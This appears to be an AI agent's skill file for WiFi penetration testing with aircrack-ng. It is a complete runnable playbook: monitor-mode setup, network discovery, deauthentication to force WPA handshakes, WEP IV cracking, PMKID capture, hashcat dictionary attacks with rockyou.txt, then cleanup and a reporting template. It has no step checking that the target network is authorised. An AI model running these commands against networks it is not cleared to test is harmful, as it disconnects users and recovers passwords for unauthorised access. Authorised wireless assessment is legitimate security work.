| name | pentest-wifi |
| description | WiFi penetration testing with the aircrack-ng suite. Covers monitor mode setup, network discovery, WPA/WPA2 handshake capture, deauthentication attacks, WEP cracking, PMKID attacks, and password cracking with aircrack-ng and hashcat.
|
| userInvocable | true |
| requiresBinaries | ["aircrack-ng"] |
| triggers | ["wifi","wireless","WPA","WPA2","WEP","aircrack","handshake","deauth","monitor mode","PMKID"] |
Skill: WiFi Penetration Testing (aircrack-ng Suite)
Prerequisites
- USB wireless adapter with monitor mode support passed through to the container
aircrack-ng package installed: apt-get update && apt-get install -y aircrack-ng
- Verify adapter visible:
iwconfig should show wlan0 (or similar)
If no wireless adapter is detected, tell the user:
"No wireless interface found. WiFi attacks require a USB adapter with monitor mode (e.g., Alfa AWUS036ACH) passed through to Docker. Add devices: ['/dev/bus/usb'] and privileged: true to docker-compose.yml."
Phase 1 — Preparation
airmon-ng check kill
airmon-ng start wlan0
iwconfig
If airmon-ng fails, try manually:
ip link set wlan0 down
iw wlan0 set monitor control
ip link set wlan0 up
Phase 2 — Network Discovery
airodump-ng wlan0mon
Output columns:
| Column | Meaning |
|---|
| BSSID | Router MAC address |
| PWR | Signal strength (higher = closer) |
| CH | Channel |
| ENC | Encryption (WPA2, WPA3, WEP, OPN) |
| ESSID | Network name |
Decision tree:
- OPN (Open) → No password needed, just connect
- WEP → Easy, crack directly with captured IVs (see Phase 3b)
- WPA/WPA2-PSK → Capture handshake + crack (see Phase 3a) — most common
- WPA3 → Significantly harder, may need dragonblood attacks (advanced)
- WPA2-Enterprise → Requires different approach (evil twin / certificate attacks)
Phase 3a — WPA/WPA2 Handshake Capture & Crack
Step 1: Target the network
airodump-ng -c <CHANNEL> --bssid <BSSID> -w /root/kali-workspace/capture wlan0mon
Leave this running. Open a second terminal for deauth.
Step 2: Force handshake via deauthentication
aireplay-ng -0 5 -a <BSSID> wlan0mon
aireplay-ng -0 5 -a <BSSID> -c <CLIENT_MAC> wlan0mon
Watch the airodump window — when you see WPA handshake: <BSSID> in the top-right, you have it.
Step 3: Crack the handshake with aircrack-ng
aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/kali-workspace/capture-01.cap
aircrack-ng -w /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt /root/kali-workspace/capture-01.cap
Step 4 (Alternative): Crack with hashcat (faster, supports rules)
aircrack-ng -J /root/kali-workspace/hash /root/kali-workspace/capture-01.cap
hashcat -m 22000 -a 0 --force /root/kali-workspace/hash.hccapx /usr/share/wordlists/rockyou.txt
hashcat -m 22000 -a 0 --force -r /usr/share/hashcat/rules/best64.rule /root/kali-workspace/hash.hccapx /usr/share/wordlists/rockyou.txt
Phase 3b — WEP Cracking (Legacy Networks)
airodump-ng -c <CHANNEL> --bssid <BSSID> -w /root/kali-workspace/wep_capture wlan0mon
aireplay-ng -1 0 -a <BSSID> wlan0mon
aireplay-ng -3 -b <BSSID> wlan0mon
aircrack-ng /root/kali-workspace/wep_capture-01.cap
Phase 4 — PMKID Attack (No Handshake Needed)
Newer approach — doesn't require a connected client:
apt-get install -y hcxdumptool hcxtools
hcxdumptool -i wlan0mon -o /root/kali-workspace/pmkid.pcapng --enable_status=1
hcxpcapngtool -o /root/kali-workspace/pmkid.hc22000 /root/kali-workspace/pmkid.pcapng
hashcat -m 22000 -a 0 --force /root/kali-workspace/pmkid.hc22000 /usr/share/wordlists/rockyou.txt
Phase 5 — Cleanup
airmon-ng stop wlan0mon
systemctl start NetworkManager 2>/dev/null || service networking restart
Reporting Template
## WiFi Assessment: <ESSID>
| Field | Value |
| ------------- | --------------------------------------- |
| ESSID | <network name> |
| BSSID | <MAC> |
| Channel | <ch> |
| Encryption | WPA2-PSK / WEP / etc. |
| Password | <cracked password or "not cracked"> |
| Method | Handshake + dictionary / PMKID / WEP IV |
| Wordlist | rockyou.txt / custom |
| Time to Crack | <duration> |
### Recommendation
- Use WPA3 if supported by all devices
- Set a complex passphrase (16+ chars, mixed case, numbers, symbols)
- Disable WPS
- Enable MAC filtering as defense-in-depth
- Monitor for deauth attacks
Troubleshooting
| Problem | Fix |
|---|
No wireless interface found | USB adapter not passed through. Add privileged: true + devices: ['/dev/bus/usb'] to docker-compose.yml |
airmon-ng: command not found | apt-get update && apt-get install -y aircrack-ng |
No handshake captured | Move closer, increase deauth count (-0 10), target specific client MAC |
aircrack-ng: no matching network found | Wrong .cap file or BSSID mismatch. Re-run airodump targeting the correct network |
hashcat: token length exception | Wrong -m mode. Use -m 22000 for WPA, -m 2500 for older hccapx |
Password not in wordlist | Try larger wordlist, rules (-r best64.rule), or custom wordlist with cewl |
rf_kill or adapter disabled | rfkill unblock all && ip link set wlan0 up |